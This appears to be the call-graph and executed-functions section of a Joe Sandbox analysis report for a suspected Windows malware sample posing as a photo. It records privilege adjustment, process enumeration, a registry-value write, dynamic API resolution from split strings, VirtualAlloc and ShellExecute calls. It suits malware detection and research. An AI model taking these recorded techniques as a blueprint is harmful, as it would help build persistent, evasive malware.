53619->53618 53620->53616 53622 10007c87 53621->53622 53623 10007c82 53621->53623 53622->53623 53624 10007a25 2 API calls 53622->53624 53623->53571 53625 10007cbf 53624->53625 53625->53571 53626->53599 53627->53601 53628->53603 53629->53613 53630->53595 53631->53358 53632->53362 53633->53361 53634->53364 53635->53366 53636->53368 53637->53362 53639 1000e1c9 __getptd 38 API calls 53638->53639 53640 1000b9d0 53639->53640 53641 1000a501 CatchGuardHandler 5 API calls 53640->53641 53642 1000ba68 53641->53642 53642->53373 53643->53379 53644->53379 53646 10008ab3 53645->53646 53648 10008aba 53645->53648 53647 10008215 38 API calls 53646->53647 53647->53648 53650 10007c48 2 API calls 53648->53650 53651 10008ade 53648->53651 53661 10008ac8 53648->53661 53649 1000a501 CatchGuardHandler 5 API calls 53655 10008dc1 53649->53655 53650->53651 53652 10008af9 53651->53652 53653 10007c7d 2 API calls 53651->53653 53654 1000839b 51 API calls 53652->53654 53653->53651 53656 10008b0d 53654->53656 53655->53385 53657 10008b49 53656->53657 53659 10008b1c 53656->53659 53658 1000b61b __fassign 40 API calls 53657->53658 53663 10008b7a 53658->53663 53660 10008930 44 API calls 53659->53660 53660->53661 53661->53649 53662 10008c55 53664 1000a510 _sprintf 63 API calls 53662->53664 53663->53662 53666 10008b85 _memset 53663->53666 53665 10008c6e 53664->53665 53667 10008930 44 API calls 53665->53667 53670 1000b0dd _strcat_s 38 API calls 53666->53670 53668 10008c7d CreateFileA 53667->53668 53668->53661 53671 10008ce2 53668->53671 53674 10008bed 53670->53674 53716 10007e91 53671->53716 53673 10008cef 53675 1000b4c8 45 API calls 53673->53675 53681 10008d02 53673->53681 53687 1000a510 53674->53687 53675->53681 53680 10008d67 53683 10008215 38 API calls 53680->53683 53681->53680 53682 10008d3b WriteFile 53681->53682 53731 10007fea 53681->53731 53682->53680 53682->53681 53684 10008d78 53683->53684 53685 10008d81 SetFileTime 53684->53685 53686 10008da2 CloseHandle 53684->53686 53685->53686 53686->53661 53688 1000a543 53687->53688 53689 1000a52e 53687->53689 53688->53689 53691 1000a54a 53688->53691 53737 1000d5b3 38 API calls __getptd_noexit 53689->53737 53739 1000c82b 63 API calls 10 library calls 53691->53739 53692 1000a533 53738 1000d561 11 API calls __cftof2_l 53692->53738 53695 1000a570 53696 10008c96 53695->53696 53740 1000c620 61 API calls 7 library calls 53695->53740 53698 10008930 53696->53698 53699 1000894f 53698->53699 53707 100089af 53698->53707 53701 1000b61b __fassign 40 API calls 53699->53701 53700 10008a70 53702 1000a501 CatchGuardHandler 5 API calls 53700->53702 53704 10008961 GetFileAttributesA 53701->53704 53703 10008a7c 53702->53703 53703->53668 53706 100089a0 CreateDirectoryA 53704->53706 53704->53707 53706->53707 53707->53700 53710 10008930 40 API calls 53707->53710 53712 100089f8 53707->53712 53708 10008a19 53713 1000b61b __fassign 40 API calls 53708->53713 53709 1000b61b __fassign 40 API calls 53709->53708 53710->53712 53712->53708 53712->53709 53714 10008a48 GetFileAttributesA 53713->53714 53714->53700 53715 10008a61 CreateDirectoryA 53714->53715 53715->53700 53717 10007ea9 53716->53717 53730 10007ea1 53716->53730 53718 10007eb8 53717->53718 53719 10008215 38 API calls 53717->53719 53717->53730 53720 10007cce 2 API calls 53718->53720 53719->53718 53721 10007ecc 53720->53721 53722 1000ac8b _malloc 38 API calls 53721->53722 53721->53730 53723 10007ee2 53722->53723 53724 1000ac8b _malloc 38 API calls 53723->53724 53723->53730 53725 10007ef3 53724->53725 53726 10007f18 53725->53726 53727 10007f09 53725->53727 53726->53730 53741 10007127 53726->53741 53728 1000ac51 _free 38 API calls 53727->53728 53728->53730 53730->53673 53735 10008002 53731->53735 53732 10008009 53732->53681 53733 100075d8 SetFilePointer 53733->53735 53735->53732 53735->53733 53736 10007637 ReadFile 53735->53736 53753 100071c0 53735->53753 53736->53735 53737->53692 53738->53696 53739->53695 53740->53696 53742 1000712e 53741->53742 53743 10007133 53741->53743 53742->53730 53745 1000719f 53743->53745 53746 10005c1f 53743->53746 53745->53730 53747 10005c30 53746->53747 53748 10005c39 53747->53748 53750 10007072 53747->53750 53748->53745 53751 1000b635 _calloc 38 API calls 53750->53751 53752 10007080 53751->53752 53752->53748 53754 100073f7 53753->53754 53756 100071d3 53753->53756 53754->53735 53756->53754 53757 10005ca2 53756->53757 53761 10005cd4 53757->53761 53760 10005ce8 53760->53756 53761->53760 53762 10007072 38 API calls 53761->53762 53763 10006974 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53761->53763 53764 100069f0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53761->53764 53762->53761 53763->53761 53764->53761 53766 10002d5e 53765->53766 53769 10002c5c _memset 53765->53769 53767 1000a501 CatchGuardHandler 5 API calls 53766->53767 53768 10002d69 53767->53768 53768->53049 53769->53769 53770 10002c87 Sleep 53769->53770 53771 10002c9d 53770->53771 53772 10002cc4 53771->53772 53773 10002d1e WriteFile 53771->53773 53774 1000ac8b _malloc 38 API calls 53772->53774 53775 10002d44 FlushFileBuffers 53773->53775 53777 10002ccf _memset 53774->53777 53776 10002d50 CloseHandle 53775->53776 53776->53766 53777->53776 53778 10002cfc WriteFile 53777->53778 53779 1000ac51 _free 38 API calls 53778->53779 53780 10002d1b 53779->53780 53780->53775 53782 1000a62e 53781->53782 53783 1000a649 53782->53783 53784 1000a65e 53782->53784 53793 1000a633 _strlen 53782->53793 53801 1000d5b3 38 API calls __getptd_noexit 53783->53801 53786 1000a594 _LocaleUpdate::_LocaleUpdate 40 API calls 53784->53786 53788 1000a669 53786->53788 53787 1000a64e 53802 1000d561 11 API calls __cftof2_l 53787->53802 53790 1000a674 53788->53790 53791 1000a72b 53788->53791 53790->53793 53796 1000a6bf GetLastError 53790->53796 53792 1000a739 MultiByteToWideChar 53791->53792 53791->53793 53792->53793 53794 1000a74d 53792->53794 53793->53053 53805 1000d5b3 38 API calls __getptd_noexit 53794->53805 53797 1000a6fd 53796->53797 53800 1000a6ca 53796->53800 53797->53793 53804 1000d5b3 38 API calls __getptd_noexit 53797->53804 53800->53797 53803 1000e58b 40 API calls _LocaleUpdate::_LocaleUpdate 53800->53803 53801->53787 53802->53793 53803->53800 53804->53793 53805->53793 53806->53062 53807->53060 53808->53062 53810 10001799 53809->53810 53811 1000179d LookupPrivilegeValueA 53809->53811 53814 1000a501 CatchGuardHandler 5 API calls 53810->53814 53812 100017b2 CloseHandle 53811->53812 53813 100017bd AdjustTokenPrivileges 53811->53813 53812->53810 53813->53812 53815 100017f0 53813->53815 53816 100017fc 53814->53816 53815->53810 53817 100017fe CreateToolhelp32Snapshot 53816->53817 53818 1000c4a0 _memset 53817->53818 53819 1000183b Process32FirstW 53818->53819 53820 1000187d 53819->53820 53821 10001881 CloseHandle 53820->53821 53822 10001858 lstrcmpiW 53820->53822 53825 1000a501 CatchGuardHandler 5 API calls 53821->53825 53822->53821 53824 1000186f Process32NextW 53822->53824 53824->53820 53826 1000189e 53825->53826 53826->53068 53826->53069 53827->53089 53828->53100 53829->53108 53830->53116 53831->53124 53832->53132 53833->53140 53834->53148 53835->53156 53836->53164 53837->53172 53838->53180 53839->53188 53840->53199 53841->53105 53842->53110 53843->53118 53844->53128 53845->53133 53846->53143 53847->53152 53848->53158 53849->53167 53850->53173 53851->53182 53852->53192 53853->53203 53854->53211 53855->53113 53856->53117 53857->53127 53858->53136 53859->53142 53860->53151 53861->53157 53862->53166 53863->53176 53864->53181 53865->53191 53866->53202 53867->53205 53868->53218 53869->53120 53870->53126 53871->53135 53872->53141 53873->53150 53874->53160 53875->53165 53876->53175 53877->53184 53878->53190 53879->53204 53880->53214 53881->53213 53882->53223 53884 1000b33b _doexit 53883->53884 53898 1000ef92 53884->53898 53888 1000b469 _doexit 53888->53226 53890 1000b451 53891 1000b217 _doexit 3 API calls 53890->53891 53892 1000b45a 53891->53892 53894 1000b467 53892->53894 53910 1000eeb9 RtlLeaveCriticalSection 53892->53910 53893 1000b3ec 53905 1000b45a 53893->53905 53894->53226 53895 1000e019 RtlEncodePointer _doexit 53897 1000b342 53895->53897 53897->53893 53897->53895 53899 1000efa7 53898->53899 53900 1000efba RtlEnterCriticalSection 53898->53900 53911 1000eed0 38 API calls 8 library calls 53899->53911 53900->53897 53902 1000efad 53902->53900 53912 1000b4aa 38 API calls 3 library calls 53902->53912 53906 1000b460 53905->53906 53907 1000b43a 53905->53907 53913 1000eeb9 RtlLeaveCriticalSection 53906->53913 53907->53888 53909 1000eeb9 RtlLeaveCriticalSection 53907->53909 53909->53890 53910->53894 53911->53902 53913->53907 53914 4017bc 53915 4017da _wcslen 53914->53915 53918 401741 53915->53918 53917 4017e3 53919 401753 53918->53919 53920 401774 53919->53920 53921 401757 53919->53921 53925 401a22 53920->53925 53931 401a8e 77 API calls 2 library calls 53921->53931 53924 401772 _memmove 53924->53917 53926 401a30 53925->53926 53927 401a3a 53925->53927 53936 4890a5 67 API calls 2 library calls 53926->53936 53930 401a4b Mailbox 53927->53930 53932 4018ff 53927->53932 53930->53924 53931->53924 53933 40190b __EH_prolog3_catch 53932->53933 53937 4018b6 53933->53937 53935 401957 Mailbox std::_Locinfo::~_Locinfo _memmove 53935->53930 53936->53927 53938 4018c2 53937->53938 53939 4018fd 53937->53939 53940 4018d3 53938->53940 53945 48a378 53938->53945 53939->53935 53940->53939 53957 48a1c4 66 API calls std::exception::_Copy_str 53940->53957 53943 4018e8 53958 49303f RaiseException 53943->53958 53948 48a382 53945->53948 53947 48a39c 53947->53940 53948->53947 53952 48a39e std::exception::exception 53948->53952 53959 48dde5 53948->53959 53976 495404 DecodePointer 53948->53976 53950 48a3dc 53978 48a284 66 API calls std::exception::operator= 53950->53978 53952->53950 53977 48ae63 76 API calls std::locale::facet::_Facet_Register 53952->53977 53953 48a3e6 53979 49303f RaiseException 53953->53979 53956 48a3f7 53957->53943 53958->53939 53960 48de62 53959->53960 53969 48ddf3 53959->53969 53986 495404 DecodePointer 53960->53986 53962 48de68 53987 48dc90 66 API calls __getptd_noexit 53962->53987 53965 48de21 RtlAllocateHeap 53965->53969 53975 48de5a 53965->53975 53967 48ddfe 53967->53969 53980 49717e 66 API calls 2 library calls 53967->53980 53981 496fcf 66 API calls 7 library calls 53967->53981 53982 48aa80 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 53967->53982 53968 48de4e 53984 48dc90 66 API calls __getptd_noexit 53968->53984 53969->53965 53969->53967 53969->53968 53973 48de4c 53969->53973 53983 495404 DecodePointer 53969->53983 53985 48dc90 66 API calls __getptd_noexit 53973->53985 53975->53948 53976->53948 53977->53950 53978->53953 53979->53956 53980->53967 53981->53967 53983->53969 53984->53973 53985->53975 53986->53962 53987->53975

                                                                Executed Functions

                                                                Function 02470031 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 811memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 024704A2
                                                                • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 024704D2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AllocInfoNativeSystemVirtual
                                                                • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                • API String ID: 2032221330-2899676511
                                                                • Opcode ID: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                                                • Instruction ID: 2326da2dee7f408e628b18e4da48dc37a5376e6e3375e45db03877ee70ecada0
                                                                • Opcode Fuzzy Hash: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                                                • Instruction Fuzzy Hash: 6962797150A3858BE730CF24C840BABB7E5BF94708F04692EE9E987351E770D989CB56
                                                                Function 1000839B Relevance: 4.9, APIs: 3, Instructions: 395timeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 812 1000839b-100083c7 813 1000891a 812->813 814 100083cd-100083d2 812->814 816 1000891f-1000892d call 1000a501 813->816 814->813 815 100083d8-100083dc 814->815 817 100083e6-100083f0 815->817 818 100083de-100083e3 call 10008215 815->818 821 100083f2-100083f5 817->821 822 10008406-10008409 817->822 818->817 825 100083f7-100083fd 821->825 826 1000840b-1000844e 821->826 822->826 827 10008450-10008455 822->827 830 100083ff-10008401 825->830 826->830 828 10008467-1000846c 827->828 829 10008457-10008464 call 10007c48 827->829 832 1000848b-100084c1 call 10007a25 call 10007cce 828->832 833 1000846e-10008489 call 10007c7d 828->833 829->828 830->816 840 100084c6-100084cb 832->840 833->832 841 100084d7-100084ea call 100075d8 840->841 842 100084cd-100084d2 840->842 845 100084f6-10008529 call 1000b4c8 call 10007637 841->845 846 100084ec-100084f1 841->846 842->816 851 10008539-10008540 845->851 852 1000852b-10008537 call 1000b09f 845->852 846->816 854 10008542-10008553 851->854 852->846 854->854 856 10008555 854->856 857 1000855b-1000855f 856->857 858 10008561-10008565 857->858 859 1000856c-1000856e 857->859 858->859 862 10008567-1000856a 858->862 860 10008570-10008572 859->860 861 10008574-10008575 859->861 860->861 863 10008577-10008586 call 1000b79f 860->863 861->857 862->857 866 10008588-10008597 call 1000b79f 863->866 867 100085bb-100085be 863->867 866->867 870 10008599-100085a8 call 1000b79f 866->870 867->857 870->867 873 100085aa-100085b9 call 1000b79f 870->873 873->867 876 100085c0-1000860a call 1000b61b 873->876 879 1000861b-10008647 876->879 880 1000860c-1000860f 876->880 882 1000864d-10008656 879->882 880->879 881 10008611-10008614 880->881 881->879 883 10008616-10008619 881->883 884 10008662-10008669 882->884 885 10008658 882->885 883->879 883->882 886 10008672-10008679 884->886 887 1000866b 884->887 885->884 888 10008682-10008684 886->888 889 1000867b 886->889 887->886 890 10008686 888->890 891 1000868d-10008694 888->891 889->888 890->891 892 10008696 891->892 893 1000869d-1000879a SystemTimeToFileTime LocalFileTimeToFileTime 891->893 892->893 894 100087a0 893->894 895 100088e1 893->895 896 100087a6-100087d1 894->896 897 100088e7-100088e9 895->897 898 100087d3-100087e5 896->898 899 100087ec-10008812 896->899 900 100088f2-1000890f 897->900 901 100088eb-100088f1 call 1000b09f 897->901 898->896 902 100087e7 898->902 904 10008814-10008855 call 10005551 899->904 905 10008857 899->905 900->813 901->900 902->897 908 1000885d-10008864 904->908 905->908 910 100088a1-100088a8 908->910 911 10008866-1000889b call 10005551 908->911 910->897 913 100088aa-100088db call 10005551 910->913 911->910 913->895
                                                                APIs
                                                                  • Part of subcall function 100075D8: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604
                                                                • __fassign.LIBCMT ref: 100085CA
                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 1000872F
                                                                • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 1000875B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: FileTime$LocalPointerSystem__fassign
                                                                • String ID:
                                                                • API String ID: 3768451866-0
                                                                • Opcode ID: f7d468db82c9f328589b25d89424934066eeb646fb4f2efd66b9fae0485f2174
                                                                • Instruction ID: 7caf3288ed05fb6a441e9699661c42ec8f0179eb69e3d41cd2bddb86a4807b91
                                                                • Opcode Fuzzy Hash: f7d468db82c9f328589b25d89424934066eeb646fb4f2efd66b9fae0485f2174
                                                                • Instruction Fuzzy Hash: 85F1BF709046659BEB64CB28C8887D9BBF0FF09390F1445E9E899DB286D735AB81CF50
                                                                Function 10005CA2 Relevance: .7, Instructions: 662COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f67011e4635fa95f2e3239d786ef2b4d711adfe7c7f6f2761a5dd8ab5be8fb57
                                                                • Instruction ID: 82261dd005aa2ff95a724a3fc746c58a7ee0d63950bd4ce8a00652ab59f08db2
                                                                • Opcode Fuzzy Hash: f67011e4635fa95f2e3239d786ef2b4d711adfe7c7f6f2761a5dd8ab5be8fb57
                                                                • Instruction Fuzzy Hash: E5522A71D0061ADFDF14CF98C9846AEBBF1FF08351F2481AAE855AB649D735AA50CF80
                                                                Function 1000324B Relevance: 206.1, APIs: 71, Strings: 46, Instructions: 1341sleepregistrylibraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 1000324b-100033b9 call 10010270 call 1000c4a0 5 100033bb-100033ce 0->5 5->5 6 100033d0-100034df Sleep call 1000c4a0 5->6 9 100034e1-100034f4 6->9 9->9 10 100034f6-10003607 Sleep call 1000c4a0 9->10 13 10003609-1000361c 10->13 13->13 14 1000361e-10003662 call 1000b19b call 1000b06c call 1000c4a0 call 1000b07e 13->14 23 10003664-10003689 call 1000b07e 14->23 24 1000368b-10003726 call 1000c4a0 wsprintfA call 1000c4a0 14->24 23->24 32 10003728-10003739 24->32 32->32 33 1000373b-10003793 Sleep call 1000c4a0 wsprintfA 32->33 39 10003794-1000379a 33->39 39->39 40 1000379c-10003817 call 1000c4a0 wsprintfA call 1000c4a0 39->40 45 10003819-1000382a 40->45 45->45 46 1000382c-100038a0 Sleep call 1000c4a0 wsprintfA call 1000c4a0 45->46 51 100038a2-100038b3 46->51 51->51 52 100038b5-10003924 Sleep call 1000c4a0 wsprintfA call 1000c4a0 51->52 57 10003926-10003937 52->57 57->57 58 10003939 57->58 59 1000393e-10003973 call 100028b9 Sleep 58->59 62 10003975-100039a6 call 100028b9 Sleep 59->62 65 100039a8-100039d9 call 100028b9 Sleep 62->65 68 100039db-10003a02 call 1000b19b call 1000b06c call 1000c4a0 65->68 75 10003a04-10003a20 call 1000b07e 68->75 78 10003a22-10003c70 call 1000c4a0 * 2 call 1000518c call 10005166 call 1000518c * 4 call 10009824 call 10002d6b Sleep * 2 call 1000c4a0 call 1000a77d call 1000c4a0 * 2 call 1000b0dd FindWindowExA 75->78 111 10003c76-10003c7e call 100018ea 78->111 112 10003ec9-10003eed call 1000c4a0 78->112 118 10003c80-10003ca7 call 10002388 Sleep call 10002388 111->118 119 10003cac-10003caf 111->119 117 10003eef-10003ef4 112->117 117->117 123 10003ef6-10003eff 117->123 132 10003e5c 118->132 121 10003cb5-10003e03 call 10002e12 119->121 122 10003e5d-10003ec4 GlobalAddAtomA 119->122 141 10003e05-10003e1c Sleep call 10002e12 121->141 142 10003e1f-10003e4d call 10002887 call 10002f95 121->142 155 100043d7-100043ed Sleep * 2 call 1000b46f 122->155 125 10003f00-10003f06 123->125 125->125 128 10003f08-10003f1f 125->128 131 10003f20-10003f26 128->131 131->131 134 10003f28-10003f35 131->134 132->122 137 10003f36-10003f3c 134->137 137->137 139 10003f3e-10003f6a call 1000c4a0 137->139 150 10003f6b-10003f71 139->150 141->142 142->122 158 10003e4f-10003e57 call 10001144 142->158 150->150 151 10003f73-10003f82 150->151 154 10003f83-10003f89 151->154 154->154 157 10003f8b-10003f98 154->157 165 100043f2-1000440f RegOpenKeyExA 155->165 159 10003f99-10003f9f 157->159 158->132 159->159 162 10003fa1-10003fcd call 1000c4a0 159->162 171 10003fce-10003fd4 162->171 167 10004411-10004418 165->167 168 10004454 165->168 169 1000441b-10004420 167->169 170 10004456-10004464 Sleep 168->170 169->169 172 10004422-1000444d RegSetValueExA RegCloseKey 169->172 173 1000446a-10004478 call 10002388 170->173 174 100042ff-10004396 call 1000c4a0 LoadLibraryA call 1000c4a0 GetProcAddress 170->174 171->171 175 10003fd6-10003fe5 171->175 172->168 176 1000444f-10004452 172->176 173->174 174->155 187 10004398-100043d5 call 1000c4a0 ShellExecuteA 174->187 179 10003fe6-10003fec 175->179 176->170 179->179 182 10003fee-10003ffd 179->182 184 10003ffe-10004004 182->184 184->184 186 10004006-10004016 184->186 188 10004017-1000401d 186->188 187->155 188->188 190 1000401f-1000402f 188->190 192 10004030-10004036 190->192 192->192 193 10004038-10004046 192->193 194 10004047-1000404d 193->194 194->194 195 1000404f-1000405f 194->195 196 10004060-10004066 195->196 196->196 197 10004068-10004078 196->197 198 10004079-1000407f 197->198 198->198 199 10004081-10004090 198->199 200 10004091-10004097 199->200 200->200 201 10004099-100040a7 200->201 202 100040a8-100040ae 201->202 202->202 203 100040b0-100040c0 202->203 204 100040c1-100040c7 203->204 204->204 205 100040c9-100040d8 204->205 206 100040d9-100040df 205->206 206->206 207 100040e1-100040f1 206->207 208 100040f3-100040f8 207->208 208->208 209 100040fa-10004103 208->209 210 10004104-1000410a 209->210 210->210 211 1000410c-10004123 210->211 212 10004124-1000412a 211->212 212->212 213 1000412c-1000419c call 1000c4a0 call 1000a77d call 1000c4a0 212->213 220 1000419d-100041a6 213->220 220->220 221 100041a8-100041b7 220->221 222 100041ba-100041c3 221->222 222->222 223 100041c5-100041d6 222->223 224 100041d8-100041e0 223->224 224->224 225 100041e2-100041eb 224->225 226 100041ee-100041f7 225->226 226->226 227 100041f9-10004283 call 1000c4a0 * 2 call 1000b0dd FindWindowExA 226->227 227->165 234 10004289-100042bd call 10001030 Sleep CoInitializeEx 227->234 237 100042fd 234->237 238 100042bf-100042df CoCreateInstance 234->238 237->174 239 100042e1-100042e7 238->239 240 100042f7 CoUninitialize 238->240 239->240 241 100042e9-100042f3 239->241 240->237 241->240
                                                                APIs
                                                                • _memset.LIBCMT ref: 100033B1
                                                                • Sleep.KERNEL32(00000001), ref: 100033D8
                                                                • _memset.LIBCMT ref: 100034D7
                                                                • Sleep.KERNEL32(00000001), ref: 100034F8
                                                                • _memset.LIBCMT ref: 100035FF
                                                                • __time64.LIBCMT ref: 1000361F
                                                                • _memset.LIBCMT ref: 10003642
                                                                • _rand.LIBCMT ref: 1000364A
                                                                • _rand.LIBCMT ref: 10003664
                                                                • _memset.LIBCMT ref: 100036E2
                                                                • wsprintfA.USER32 ref: 10003707
                                                                • _memset.LIBCMT ref: 1000371E
                                                                • Sleep.KERNEL32(00000001), ref: 1000374F
                                                                • _memset.LIBCMT ref: 10003762
                                                                • wsprintfA.USER32 ref: 1000377F
                                                                • _memset.LIBCMT ref: 100037CE
                                                                • wsprintfA.USER32 ref: 100037F4
                                                                • _memset.LIBCMT ref: 1000380F
                                                                • Sleep.KERNEL32(00000001), ref: 1000382E
                                                                • _memset.LIBCMT ref: 10003860
                                                                • wsprintfA.USER32 ref: 10003881
                                                                • _memset.LIBCMT ref: 10003898
                                                                • Sleep.KERNEL32(00000001), ref: 100038B7
                                                                • _memset.LIBCMT ref: 100038E4
                                                                • wsprintfA.USER32 ref: 10003905
                                                                • _memset.LIBCMT ref: 1000391C
                                                                  • Part of subcall function 100028B9: _memset.LIBCMT ref: 100028FF
                                                                  • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002911
                                                                  • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002920
                                                                • Sleep.KERNEL32(000003F2), ref: 10003968
                                                                • Sleep.KERNEL32(000003F2), ref: 1000399B
                                                                • Sleep.KERNEL32(000003F2), ref: 100039CE
                                                                • __time64.LIBCMT ref: 100039DC
                                                                • _memset.LIBCMT ref: 100039FA
                                                                • _rand.LIBCMT ref: 10003A04
                                                                • _memset.LIBCMT ref: 10003A33
                                                                • _memset.LIBCMT ref: 10003A91
                                                                  • Part of subcall function 10009824: __EH_prolog3_GS.LIBCMT ref: 1000982E
                                                                  • Part of subcall function 10009824: wsprintfA.USER32 ref: 100098BD
                                                                  • Part of subcall function 10009824: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 10009BF6
                                                                  • Part of subcall function 10002D6B: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002D87
                                                                  • Part of subcall function 10002D6B: GetFileSize.KERNEL32(00000000,00000000), ref: 10002D92
                                                                  • Part of subcall function 10002D6B: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002DAD
                                                                  • Part of subcall function 10002D6B: CloseHandle.KERNEL32(?), ref: 10002DCC
                                                                • Sleep.KERNEL32(00000001), ref: 10003BB1
                                                                • Sleep.KERNEL32(00000320), ref: 10003BB8
                                                                • _memset.LIBCMT ref: 10003BD2
                                                                • _mbstowcs.LIBCMT ref: 10003BEF
                                                                  • Part of subcall function 1000A77D: __mbstowcs_l_helper.LIBCMT ref: 1000A79D
                                                                • _memset.LIBCMT ref: 10003C10
                                                                • _memset.LIBCMT ref: 10003C37
                                                                • _strcat_s.LIBCMT ref: 10003C54
                                                                • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 10003C67
                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FB), ref: 10003C94
                                                                • GlobalAddAtomA.KERNEL32(?), ref: 10003E65
                                                                • _memset.LIBCMT ref: 10003EDE
                                                                • _memset.LIBCMT ref: 10003F5B
                                                                • _memset.LIBCMT ref: 10003FBE
                                                                  • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                                                  • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                                                  • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001BF8
                                                                  • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                                                  • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                                                  • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001E90
                                                                  • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                                                  • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                                                  • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10002128
                                                                  • Part of subcall function 10002388: __EH_prolog3_GS.LIBCMT ref: 10002392
                                                                  • Part of subcall function 10002388: CoInitializeEx.COMBASE(00000000,00000000), ref: 1000239B
                                                                  • Part of subcall function 10002388: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 100023AD
                                                                  • Part of subcall function 10002388: CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 100023C7
                                                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023D4
                                                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023F4
                                                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 10002411
                                                                  • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 1000242E
                                                                • _memset.LIBCMT ref: 1000432A
                                                                • LoadLibraryA.KERNEL32(?,?,00000000,000000F3), ref: 1000433A
                                                                • _memset.LIBCMT ref: 1000437B
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000438C
                                                                • _memset.LIBCMT ref: 100043B8
                                                                • ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000005,?,00000000,000000FA,?,?,?,?,00000000,000000F1), ref: 100043D5
                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,00000000,000000F1), ref: 100043E2
                                                                • Sleep.KERNEL32(00000001,?,?,?,?,00000000,000000F1), ref: 100043E6
                                                                  • Part of subcall function 1000B46F: _doexit.LIBCMT ref: 1000B47B
                                                                • RegOpenKeyExA.KERNEL32(80000001,10019800,00000000,000F003F,?), ref: 10004407
                                                                • RegSetValueExA.KERNEL32(?,10019830,00000000,00000001,?,?,?,?,?,?,00000000,000000F1), ref: 10004439
                                                                • RegCloseKey.KERNEL32(?,?,?,?,?,00000000,000000F1), ref: 10004445
                                                                • Sleep.KERNEL32(000003E8), ref: 1000445B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$Sleep$Open$Processwsprintf$Close$HandleInitVariant$FileToken_rand$CreateH_prolog3_Initialize__time64$AddressAtomDebugExecuteFindGlobalInstanceLibraryLoadOutputProcReadSecurityShellSizeStringValueWindow__mbstowcs_l_helper_doexit_mbstowcs_strcat_s
